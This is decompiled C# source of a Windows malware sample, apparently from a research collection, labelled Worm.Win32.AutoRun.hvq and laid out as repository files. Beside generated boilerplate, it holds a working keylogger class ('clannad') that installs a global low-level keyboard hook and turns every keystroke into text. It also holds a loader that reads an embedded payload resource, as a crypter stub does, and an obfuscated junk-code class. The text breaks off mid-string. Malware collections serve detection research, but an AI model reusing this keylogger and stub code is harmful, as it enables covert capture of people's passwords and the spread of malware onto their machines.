// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MySettingsProperty
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace My
{
[StandardModule]
[HideModuleName]
[CompilerGenerated]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: My.Resources.Resources
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace My.Resources
{
[CompilerGenerated]
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) My.Resources.Resources.resourceMan, (object) null))
My.Resources.Resources.resourceMan = new ResourceManager(nameof (Resources), typeof (My.Resources.Resources).Assembly);
return My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => My.Resources.Resources.resourceCulture;
set => My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/Pass.cs
+107
View File
@@ -0,0 +1,107 @@
// Decompiled with JetBrains decompiler
// Type: Pass
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Security.Cryptography;
[StandardModule]
internal sealed class Pass
{
public class RandomPassword
{
private static int DEFAULT_MIN_PASSWORD_LENGTH = 8;
private static int DEFAULT_MAX_PASSWORD_LENGTH = 10;
private static string PASSWORD_CHARS_LCASE = "abcdefgijkmnopqrstwxyz";
private static string PASSWORD_CHARS_UCASE = "ABCDEFGHJKLMNPQRSTWXYZ";
private static string PASSWORD_CHARS_NUMERIC = "0123456789";
private static string PASSWORD_CHARS_SPECIAL = "*$-+?_&=!%{}/";
[DebuggerNonUserCode]
public RandomPassword()
{
}
public static string Generate() => Pass.RandomPassword.Generate(Pass.RandomPassword.DEFAULT_MIN_PASSWORD_LENGTH, Pass.RandomPassword.DEFAULT_MAX_PASSWORD_LENGTH);
public static string Generate(int length) => Pass.RandomPassword.Generate(length, length);
public static string Generate(int minLength, int maxLength)
{
if (minLength <= 0 | maxLength <= 0 | minLength > maxLength)
;
char[][] chArray1 = new char[4][]
{
Pass.RandomPassword.PASSWORD_CHARS_LCASE.ToCharArray(),
Pass.RandomPassword.PASSWORD_CHARS_UCASE.ToCharArray(),
Pass.RandomPassword.PASSWORD_CHARS_NUMERIC.ToCharArray(),
Pass.RandomPassword.PASSWORD_CHARS_SPECIAL.ToCharArray()
};
int[] numArray1 = new int[checked (chArray1.Length - 1 + 1)];
int num1 = checked (numArray1.Length - 1);
int index1 = 0;
while (index1 <= num1)
{
numArray1[index1] = chArray1[index1].Length;
checked { ++index1; }
}
int[] numArray2 = new int[checked (chArray1.Length - 1 + 1)];
int num2 = checked (numArray2.Length - 1);
int index2 = 0;
while (index2 <= num2)
{
numArray2[index2] = index2;
checked { ++index2; }
}
byte[] data = new byte[4];
new RNGCryptoServiceProvider().GetBytes(data);
Random random = new Random(((int) data[0] & (int) sbyte.MaxValue) << 24 | (int) (byte) ((uint) data[1] << 0) | (int) (byte) ((uint) data[2] << 0) | (int) data[3]);
char[] chArray2 = minLength >= maxLength ? new char[checked (minLength - 1 + 1)] : new char[checked (random.Next(minLength - 1, maxLength) + 1)];
int maxValue = checked (numArray2.Length - 1);
int num3 = checked (chArray2.Length - 1);
int index3 = 0;
while (index3 <= num3)
{
int index4 = maxValue != 0 ? random.Next(0, maxValue) : 0;
int index5 = numArray2[index4];
int index6 = checked (numArray1[index5] - 1);
int index7 = index6 != 0 ? random.Next(0, checked (index6 + 1)) : 0;
chArray2[index3] = chArray1[index5][index7];
if (index6 == 0)
{
numArray1[index5] = chArray1[index5].Length;
}
else
{
if (index6 != index7)
{
char ch = chArray1[index5][index6];
chArray1[index5][index6] = chArray1[index5][index7];
chArray1[index5][index7] = ch;
}
numArray1[index5] = checked (numArray1[index5] - 1);
}
if (maxValue == 0)
{
maxValue = checked (numArray2.Length - 1);
}
else
{
if (maxValue != index4)
{
int num4 = numArray2[maxValue];
numArray2[maxValue] = numArray2[index4];
numArray2[index4] = num4;
}
checked { --maxValue; }
}
checked { ++index3; }
}
return new string(chArray2);
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/RandomPassword.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/ResourceReader.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: ResourceReader
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
[StandardModule]
internal sealed class ResourceReader
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
public static byte[] ReadResource(string filename)
{
IntPtr moduleHandle = ResourceReader.GetModuleHandle(ref filename);
IntPtr resource = ResourceReader.FindResource(moduleHandle, "0", "RT_RCDATA");
IntPtr source = ResourceReader.LoadResource(moduleHandle, resource);
int length = ResourceReader.SizeofResource(moduleHandle, resource);
byte[] destination = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, destination, 0, length);
return destination;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/Worm.Win32.AutoRun.hvq.csproj
+58
View File
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{67131D87-3F99-48B6-90F9-6A1494417EF8}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Stub</AssemblyName>
<ApplicationVersion>2.0.2.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="clannad.cs" />
<Compile Include="F7h5o2wX4skMmN8HU.cs" />
<Compile Include="p93tq7zN7k4Aua4hyWC673C50x7.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Pass.cs" />
<Compile Include="usb.cs" />
<Compile Include="ResourceReader.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="RandomPassword.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/Worm.Win32.AutoRun.hvq.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Stub", "Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.csproj", "{67131D87-3F99-48B6-90F9-6A1494417EF8}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{67131D87-3F99-48B6-90F9-6A1494417EF8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{67131D87-3F99-48B6-90F9-6A1494417EF8}.Debug|Any CPU.Build.0 = Debug|Any CPU
{67131D87-3F99-48B6-90F9-6A1494417EF8}.Release|Any CPU.ActiveCfg = Release|Any CPU
{67131D87-3F99-48B6-90F9-6A1494417EF8}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/clannad.cs
+216
View File
@@ -0,0 +1,216 @@
// Decompiled with JetBrains decompiler
// Type: clannad
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Windows.Forms;
public class clannad
{
private static int Key;
private static clannad.KDel KHD;
[DebuggerNonUserCode]
public clannad()
{
}
[DllImport("user32", EntryPoint = "SetWindowsHookExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SetWindowsHookEx(
int Hook,
clannad.KDel KeyDelegate,
int HMod,
int ThreadId);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int CallNextHookEx(
int Hook,
int nCode,
int wParam,
ref clannad.KeyStructure lParam);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int UnhookWindowsHookEx(int Hook);
public static event clannad.DownEventHandler Down;
public static event clannad.UpEventHandler Up;
public void CreateHook()
{
clannad.KHD = new clannad.KDel(this.Proc);
clannad.Key = clannad.SetWindowsHookEx(13, clannad.KHD, Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]).ToInt32(), 0);
}
private int Proc(int Code, int wParam, ref clannad.KeyStructure lParam)
{
if (Code == 0)
{
switch (wParam)
{
case 256:
case 260:
clannad.DownEventHandler downEvent = clannad.DownEvent;
if (downEvent != null)
{
downEvent(this.Feed((Keys) lParam.Code));
break;
}
break;
case 257:
case 261:
clannad.UpEventHandler upEvent = clannad.UpEvent;
if (upEvent != null)
{
upEvent(this.Feed((Keys) lParam.Code));
break;
}
break;
}
}
return clannad.CallNextHookEx(clannad.Key, Code, wParam, ref lParam);
}
public void DiposeHook()
{
clannad.UnhookWindowsHookEx(clannad.Key);
// ISSUE: explicit finalizer call
this.Finalize();
}
private string Feed(Keys e)
{
Keys keys = e;
if (keys >= Keys.A && keys <= Keys.Z)
return Control.IsKeyLocked(Keys.Capital) | (Control.ModifierKeys & Keys.Shift) != Keys.None ? e.ToString() : e.ToString().ToLower();
if (keys >= Keys.D0 && keys <= Keys.D9)
{
if ((Control.ModifierKeys & Keys.Shift) == Keys.None)
return e.ToString().Replace("D", (string) null);
string Left = e.ToString();
if (Operators.CompareString(Left, "D1", false) == 0)
return "!";
if (Operators.CompareString(Left, "D2", false) == 0)
return "@";
if (Operators.CompareString(Left, "D3", false) == 0)
return "#";
if (Operators.CompareString(Left, "D4", false) == 0)
return "$";
if (Operators.CompareString(Left, "D5", false) == 0)
return "%";
if (Operators.CompareString(Left, "D6", false) == 0)
return "^";
if (Operators.CompareString(Left, "D7", false) == 0)
return "&";
if (Operators.CompareString(Left, "D8", false) == 0)
return "*";
if (Operators.CompareString(Left, "D9", false) == 0)
return "(";
if (Operators.CompareString(Left, "D0", false) == 0)
return ")";
}
else
{
if (keys >= Keys.NumPad0 && keys <= Keys.NumPad9)
return e.ToString().Replace("NumPad", (string) null);
if (keys >= Keys.Multiply && keys <= Keys.Divide)
{
string Left = e.ToString();
if (Operators.CompareString(Left, "Divide", false) == 0)
return "/";
if (Operators.CompareString(Left, "Multiply", false) == 0)
return "*";
if (Operators.CompareString(Left, "Subtract", false) == 0)
return "-";
if (Operators.CompareString(Left, "Add", false) == 0)
return "+";
if (Operators.CompareString(Left, "Decimal", false) == 0)
return ".";
}
else
{
if (keys == Keys.Space)
return " ";
if (keys >= Keys.OemSemicolon && keys <= Keys.OemQuotes)
{
if ((Control.ModifierKeys & Keys.Shift) != Keys.None)
{
string Left = e.ToString();
if (Operators.CompareString(Left, "OemMinus", false) == 0)
return "_";
if (Operators.CompareString(Left, "Oemplus", false) == 0)
return "+";
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
return "{";
if (Operators.CompareString(Left, "Oem6", false) == 0)
return "}";
if (Operators.CompareString(Left, "Oem5", false) == 0)
return "|";
if (Operators.CompareString(Left, "Oem1", false) == 0)
return ":";
if (Operators.CompareString(Left, "Oem7", false) == 0)
return "\"";
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
return "<";
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
return ">";
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
return "?";
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
return "~";
}
else
{
string Left = e.ToString();
if (Operators.CompareString(Left, "OemMinus", false) == 0)
return "-";
if (Operators.CompareString(Left, "Oemplus", false) == 0)
return "=";
if (Operators.CompareString(Left, "OemOpenBrackets", false) == 0)
return "[";
if (Operators.CompareString(Left, "Oem6", false) == 0)
return "]";
if (Operators.CompareString(Left, "Oem5", false) == 0)
return "\\";
if (Operators.CompareString(Left, "Oem1", false) == 0)
return ";";
if (Operators.CompareString(Left, "Oem7", false) == 0)
return "'";
if (Operators.CompareString(Left, "Oemcomma", false) == 0)
return ",";
if (Operators.CompareString(Left, "OemPeriod", false) == 0)
return ".";
if (Operators.CompareString(Left, "OemQuestion", false) == 0)
return "/";
if (Operators.CompareString(Left, "Oemtilde", false) == 0)
return "`";
}
}
else
return keys == Keys.Return ? Environment.NewLine : "<" + e.ToString() + ">";
}
}
return (string) null;
}
private delegate int KDel(int nCode, int wParam, ref clannad.KeyStructure lParam);
public delegate void DownEventHandler(string Key);
public delegate void UpEventHandler(string Key);
private struct KeyStructure
{
public int Code;
public int ScanCode;
public int Flags;
public int Time;
public int ExtraInfo;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/p93tq7zN7k4Aua4hyWC673C50x7.cs
+160
View File
@@ -0,0 +1,160 @@
// Decompiled with JetBrains decompiler
// Type: p93tq7zN7k4Aua4hyWC673C50x7
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Windows.Forms;
public class p93tq7zN7k4Aua4hyWC673C50x7
{
[DebuggerNonUserCode]
public p93tq7zN7k4Aua4hyWC673C50x7()
{
}
public void wy50So2xTbr40ZLr7()
{
bool flag = false;
int num1 = 11462331;
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num2 = 67243;
do
{
flag = false;
checked { ++num2; }
}
while (num2 <= 721895);
while (true)
{
num1 = 42292;
flag = true;
}
}
int num3 = (int) Interaction.MsgBox((object) "E5Cl8PTo62aLR2Z2wy");
}
}
public object GqKW6sUeuYVEreQ3JVB4LVBCvCP4()
{
string str = "y\u008F%iˆ4yd8";
